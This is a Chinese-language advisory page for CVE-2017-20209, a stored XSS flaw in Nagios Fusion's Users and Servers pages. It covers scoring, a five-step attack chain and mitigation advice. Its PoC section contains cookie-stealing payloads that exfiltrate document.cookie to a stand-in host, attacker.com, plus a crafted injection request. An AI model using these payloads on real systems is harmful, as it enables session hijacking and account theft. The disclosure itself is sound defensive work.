CVE-2017-20209 CVSS 6.1 中危

CVE-2017-20209: Nagios Fusion跨站脚本(XSS)漏洞

披露日期: 2025-10-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2017-20209

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Nagios Fusion

漏洞概述

Nagios Fusion 4.0.1之前版本存在存储型跨站脚本漏洞。攻击者可以通过Users和Servers页面注入恶意JavaScript代码，由于应用程序对用户输入缺乏充分的验证和转义，恶意脚本会被存储在服务器端。当其他用户访问受影响的页面时，注入的脚本将在其浏览器上下文中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。该漏洞无需认证即可利用，但需要用户交互触发。CVSS评分为6.1，属于中危漏洞。攻击者可利用此漏洞获取敏感信息或对应用程序进行进一步攻击。

技术细节

该漏洞为存储型XSS（Stored XSS），存在于Nagios Fusion的Users和Servers页面。攻击者构造恶意Payload（如<script>alert(document.cookie)</script>）并通过用户输入字段提交，由于应用程序未对用户输入进行充分的输入验证和输出编码，恶意脚本被永久存储在数据库中。当管理员或其他用户访问包含恶意内容的页面时，浏览器会解析并执行注入的脚本代码。攻击者可以利用此漏洞窃取受害者的会话令牌、凭据或其他敏感信息，甚至可能通过构造更复杂的Payload来执行任意操作。攻击向量的网络位置为远程（AV:N），无需特殊权限（PR:N），但需要用户交互（UI:R）触发。

攻击链分析

STEP 1

步骤1

攻击者访问Nagios Fusion应用程序，找到Users或Servers页面

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的Payload（如<script>标签）

STEP 3

步骤3

攻击者通过表单提交恶意Payload，由于缺乏输入验证，脚本被存储在服务器数据库中

STEP 4

步骤4

受害者（管理员或其他用户）访问包含恶意内容的页面

STEP 5

步骤5

受害者浏览器解析并执行注入的恶意脚本，导致Cookie窃取或会话劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<script>alert('XSS Vulnerability - CVE-2017-20209');document.location='https://attacker.com/steal?cookie='+document.cookie</script>  <img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)"> <svg/onload=fetch('https://attacker.com/log?c='+btoa(document.cookie))>  POST /nagiosfusion/users/add HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded username=<script>alert(document.domain)</script>&[email protected]&submit=Add

影响范围

Nagios Fusion < 4.0.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制Users和Servers页面的访问权限，仅允许可信用户访问；2) 在Web应用防火墙(WAF)层面配置XSS防护规则，过滤<script>等危险标签；3) 对现有数据库中的恶意内容进行清理和排查；4) 监控应用程序日志，及时发现异常请求和注入尝试。建议尽快升级到官方发布的安全版本。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表